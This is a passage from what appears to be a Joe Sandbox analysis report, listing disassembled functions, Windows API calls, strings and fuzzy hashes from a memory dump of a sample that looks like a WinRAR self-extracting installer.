Instruction Fuzzy Hash: B451D1305083D54FC716CF29859456EFFE4AFDA318F49889EE4E94B212C230DB4AEB52

Function 00C71595 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42bdfc3f60dad55180fc3e076fe0f01d85970f628577caba8d2b4c26abbe71e8
Instruction ID: 15516a392827c3b5b3579113c8a506803068eb6caae2c4f50ddb8c40b1338527
Opcode Fuzzy Hash: 42bdfc3f60dad55180fc3e076fe0f01d85970f628577caba8d2b4c26abbe71e8
Instruction Fuzzy Hash: 6E21B631A301A14BCB0DCE2DDC9463E7751E78B30174AC22FEE4ACB691C535EA26D7A0

Function 00C7F90B Relevance: 33.7, APIs: 15, Strings: 4, Instructions: 438windowfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00C7F910

Part of subcall function 00C7E5B0: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00C7E678

SetFileAttributesW.KERNEL32(?,00000005,?,?,00000000,00000001,00C7F221,?,00000000), ref: 00C7FA45
SHFileOperationW.SHELL32(?), ref: 00C7FAF2
GetFileAttributesW.KERNEL32(?), ref: 00C7FAFF
DeleteFileW.KERNEL32(?), ref: 00C7FB0D
SetWindowTextW.USER32(?,?), ref: 00C7FC56
_wcsrchr.LIBVCRUNTIME ref: 00C7FDE0
GetDlgItem.USER32(?,00000066), ref: 00C7FE1B
SetWindowTextW.USER32(00000000,?), ref: 00C7FE2B
SendMessageW.USER32(00000000,00000143,00000000,00CBA73A), ref: 00C7FE3F
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C7FE68

Strings

ProgramFilesDir, xrefs: 00C7FD2A
%s.%d.tmp, xrefs: 00C7FB25
<br>, xrefs: 00C7FBB9
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C7FCFF

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemOperationStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 764735972-312220925
Opcode ID: ca1e0c3c4881ea37585423daec3c62d249bb8e3a3e0befeecbcbac5bcb25b044
Instruction ID: 9a2b0e90db1b57035db8f3b3a77837bec3ceb8da573b2f48d9d4dfa4cafb045e
Opcode Fuzzy Hash: ca1e0c3c4881ea37585423daec3c62d249bb8e3a3e0befeecbcbac5bcb25b044
Instruction Fuzzy Hash: 47E19572900119AAEF25EBA0DD85EEE737CAF04354F1080BAF959E3051EF709B85DB64

Function 00C8E37B Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00C8E3BF

Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DF77
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DF89
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DF9B
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFAD
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFBF
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFD1
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFE3
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8DFF5
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E007
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E019
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E02B
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E03D
Part of subcall function 00C8DF5A: _free.LIBCMT ref: 00C8E04F

_free.LIBCMT ref: 00C8E3B4

Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826

_free.LIBCMT ref: 00C8E3D6
_free.LIBCMT ref: 00C8E3EB
_free.LIBCMT ref: 00C8E3F6
_free.LIBCMT ref: 00C8E418
_free.LIBCMT ref: 00C8E42B
_free.LIBCMT ref: 00C8E439
_free.LIBCMT ref: 00C8E444
_free.LIBCMT ref: 00C8E47C
_free.LIBCMT ref: 00C8E483
_free.LIBCMT ref: 00C8E4A0
_free.LIBCMT ref: 00C8E4B8

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 7c4c81a1eb352cea7afcd963bef55403107ac01dfcae639e477e8e1882c69864
Instruction ID: c0fc55461a560c4374b707aa3c75d6fb126e9639eeef685b6fc74c72fb19cb58
Opcode Fuzzy Hash: 7c4c81a1eb352cea7afcd963bef55403107ac01dfcae639e477e8e1882c69864
Instruction Fuzzy Hash: 7C318E31600305AFEB30BA78D845B5A73E9EF44318F14442AF469D71A1EF71EE80EB29

Function 00C80782 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00C807A3
GetClassNameW.USER32(00000000,?,00000800), ref: 00C807D2

Part of subcall function 00C76FA3: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C72D5B,?,?,?,00C72D0A,?,-00000002,?,00000000,?), ref: 00C76FB9

GetWindowLongW.USER32(00000000,000000F0), ref: 00C807F0
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00C80807
GetObjectW.GDI32(00000000,00000018,?), ref: 00C8081A

Part of subcall function 00C7DA58: GetDC.USER32(00000000), ref: 00C7DA64
Part of subcall function 00C7DA58: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C7DA73
Part of subcall function 00C7DA58: ReleaseDC.USER32(00000000,00000000), ref: 00C7DA81

Part of subcall function 00C7DA15: GetDC.USER32(00000000), ref: 00C7DA21
Part of subcall function 00C7DA15: GetDeviceCaps.GDI32(00000000,00000058), ref: 00C7DA30
Part of subcall function 00C7DA15: ReleaseDC.USER32(00000000,00000000), ref: 00C7DA3E

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00C80841
DeleteObject.GDI32(00000000), ref: 00C80848
GetWindow.USER32(00000000,00000002), ref: 00C80851

Strings

STATIC, xrefs: 00C807D8

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 1444658586-1882779555
Opcode ID: 77b6e5ff1c71d88815d2b8e29ed35f0c303971d9ab89afda7c7399ca09b17534
Instruction ID: f4661ef7b53258a71744423aa7d8ebf3a8e5c2f1bbaed42c40b93e5a6f5e324e
Opcode Fuzzy Hash: 77b6e5ff1c71d88815d2b8e29ed35f0c303971d9ab89afda7c7399ca09b17534
Instruction Fuzzy Hash: EC21F0725417147BEB217B649C4EFAF376CAF05711F214022FA19E60C2CA649E8697E8

Function 00C8B02E Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C8B042

Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826

_free.LIBCMT ref: 00C8B04E
_free.LIBCMT ref: 00C8B059
_free.LIBCMT ref: 00C8B064
_free.LIBCMT ref: 00C8B06F
_free.LIBCMT ref: 00C8B07A
_free.LIBCMT ref: 00C8B085
_free.LIBCMT ref: 00C8B090
_free.LIBCMT ref: 00C8B09B
_free.LIBCMT ref: 00C8B0A9

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: feeabcb93c1070f050c4b24f114d0ad9493f9b558a8e61cbd2a4efab3c1e56e2
Instruction ID: ca86af60c7b892f010a409835ab64eaf2e4aca20e6657b0464b3fe47cad4bb37
Opcode Fuzzy Hash: feeabcb93c1070f050c4b24f114d0ad9493f9b558a8e61cbd2a4efab3c1e56e2
Instruction Fuzzy Hash: 6111747A550148AFDB11FF98C842DD93BB5EF08354B5141A6FA088B236EA31DF90FB85

Function 00C7E823 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA

EndDialog.USER32(?,00000001), ref: 00C7E873
SendMessageW.USER32(?,00000080,00000001,?), ref: 00C7E8A0
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00C7E8B5
SetWindowTextW.USER32(?,?), ref: 00C7E8C6
GetDlgItem.USER32(?,00000065), ref: 00C7E8CF
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00C7E8E3
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00C7E8F5

Strings

LICENSEDLG, xrefs: 00C7E837

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 1ded733474fb68cef1553da994ab9f3abbb4af9fb96391f45b3dbf8ffdac1a59
Instruction ID: b77a6b07d114541e0788cfc37ecc6a7ccf33369f6fbc60e1df91ddb50e12ed5c
Opcode Fuzzy Hash: 1ded733474fb68cef1553da994ab9f3abbb4af9fb96391f45b3dbf8ffdac1a59
Instruction Fuzzy Hash: A221B833204204BBE6116B7AEC49F7F3B6CEB4AB55F05806DF609E21E1CB629D01A635

Function 00C7CCC4 Relevance: 12.1, APIs: 8, Instructions: 135windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00C7CCDD
GetTickCount.KERNEL32 ref: 00C7CCFB
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7CD11
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7CD25
TranslateMessage.USER32(?), ref: 00C7CD30
DispatchMessageW.USER32(?), ref: 00C7CD3B
ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00C7CDEB
SetWindowTextW.USER32(?,00000000), ref: 00C7CDF5

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
String ID:
API String ID: 4150546248-0
Opcode ID: 04de50a64e3405bd62768280bdd1f18213dd876b615c561f0efadaf2af2abc25
Instruction ID: 89cbac522a16d4bfd0b7049a0c71499520672dfd40250306d99f3d22a0c3ad67
Opcode Fuzzy Hash: 04de50a64e3405bd62768280bdd1f18213dd876b615c561f0efadaf2af2abc25
Instruction Fuzzy Hash: 55415B71204306AFD710DF65D888E2BBBE8FF98705B10482EFA5AC7160DB71E945CB62

Function 00C913ED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00C91B62,?,00000000,?,00000000,00000000), ref: 00C9142F
__fassign.LIBCMT ref: 00C914AA
__fassign.LIBCMT ref: 00C914C5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00C914EB
WriteFile.KERNEL32(?,?,00000000,00C91B62,00000000,?,?,?,?,?,?,?,?,?,00C91B62,?), ref: 00C9150A
WriteFile.KERNEL32(?,?,00000001,00C91B62,00000000,?,?,?,?,?,?,?,?,?,00C91B62,?), ref: 00C91543

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 2463198b58545e3113155ecb69152a458399af741e627f6261b62201e5b7c6be
Instruction ID: e5c2f632f2f6cf4e8d421693de85dd5e1fa8c128c671497f1684254314ee36de
Opcode Fuzzy Hash: 2463198b58545e3113155ecb69152a458399af741e627f6261b62201e5b7c6be
Instruction Fuzzy Hash: 4E5198719002499FDF11CFA8D84ABEEBBF4FF49300F19419AE956E7251E7309A41CBA1

Function 00C73793 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C73819
_strlen.LIBCMT ref: 00C73849
_swprintf.LIBCMT ref: 00C7386A
_wcschr.LIBVCRUNTIME ref: 00C73893
_wcsrchr.LIBVCRUNTIME ref: 00C738DF

Strings

%08x, xrefs: 00C7385E

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _strlen$_swprintf_wcschr_wcsrchr
String ID: %08x
API String ID: 1593746830-3682738293
Opcode ID: 862a48f151f8025f07fe9a09c2bb82bea868d5056f5769776f023ee6ee44235b
Instruction ID: 617d38e3a79f8dcf0989fb1137ed0fa27af2726fce183cea1b44d3ab289672ce
Opcode Fuzzy Hash: 862a48f151f8025f07fe9a09c2bb82bea868d5056f5769776f023ee6ee44235b
Instruction Fuzzy Hash: B1415B729043846ADB35A624CC4AFBB73ECEF84320F14852AF95D97192DA70DF04A362

Function 00C7CE13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00C7D63B,?), ref: 00C7CEE8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00C7CF09

Strings

<html>, xrefs: 00C7CE57, 00C7CE90
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00C7CE62
utf-8"></head>, xrefs: 00C7CE6D
</html>, xrefs: 00C7CEBA

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 0226c8094b09d498a3ad74c2eda2d68679dfddf40fe633dee51fd050c6d427eb
Instruction ID: 56824a2ac64dfe135907df5d722258d2350ef80d2aaa5c765d0d7f8b893059c4
Opcode Fuzzy Hash: 0226c8094b09d498a3ad74c2eda2d68679dfddf40fe633dee51fd050c6d427eb
Instruction Fuzzy Hash: 273126321097027ED725BB61EC8AF6F779CEF81324F14801EF519961C2EF749A0993A9

Function 00C7D4D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00C7D4EB
GetWindowRect.USER32(?,?), ref: 00C7D510
ShowWindow.USER32(?,00000005,?), ref: 00C7D5A7
SetWindowTextW.USER32(?,00000000), ref: 00C7D5AF
ShowWindow.USER32(00000000,00000005), ref: 00C7D5C5

Strings

RarHtmlClassName, xrefs: 00C7D571

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: b96f602c3ac8bceb666d6f82a43f961bbb2d2ddbcdaa5271ce4317e5c9036565
Instruction ID: 1ff4f6949e4ed4834d5e074b832b92d0c8c6c0566fc9ab0864424715888c1d9e
Opcode Fuzzy Hash: b96f602c3ac8bceb666d6f82a43f961bbb2d2ddbcdaa5271ce4317e5c9036565
Instruction Fuzzy Hash: 0C31A071105200AFCB119F64DC8DB2F7FB8EF48715F05856AF91AAA152CB30DA11CBA2

Function 00C8E0FD Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C8E0C1: _free.LIBCMT ref: 00C8E0EA

_free.LIBCMT ref: 00C8E14B

Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826

_free.LIBCMT ref: 00C8E156
_free.LIBCMT ref: 00C8E161
_free.LIBCMT ref: 00C8E1B5
_free.LIBCMT ref: 00C8E1C0
_free.LIBCMT ref: 00C8E1CB
_free.LIBCMT ref: 00C8E1D6

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0eecabecddca2cb04458630b41565ebd8c72ec0f874f5171aa64c18967021957
Instruction ID: 226449fd79d6e5fc4b288d2d5bc2d4b3a5c2e867e9711430c93c54d020c4e67b
Opcode Fuzzy Hash: 0eecabecddca2cb04458630b41565ebd8c72ec0f874f5171aa64c18967021957
Instruction Fuzzy Hash: C2114F71540B08BAEA20BBB0CC47FCB77BD9F04709F410C15F29967052EBA5B694B756

Function 00C8595E Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C85955,00C82E38), ref: 00C8596C
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C8597A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C85993
SetLastError.KERNEL32(00000000,?,00C85955,00C82E38), ref: 00C859E5

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3de8b5a208aaab418a8cfa53913f9e620df4c990b235158ddcd7eec75aaebbd6
Instruction ID: f322a0487c6996026b2693248eef962e32c56cc0242fd6b72d322873b96c7593
Opcode Fuzzy Hash: 3de8b5a208aaab418a8cfa53913f9e620df4c990b235158ddcd7eec75aaebbd6
Instruction Fuzzy Hash: A501D432608B11EEE6253679BC89B6E2648DB4177DB20023FF1249A0E5EF914C13A358

Function 00C815E6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

KERNEL32.DLL, xrefs: 00C81600
AcquireSRWLockExclusive, xrefs: 00C81615
ReleaseSRWLockExclusive, xrefs: 00C81625

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
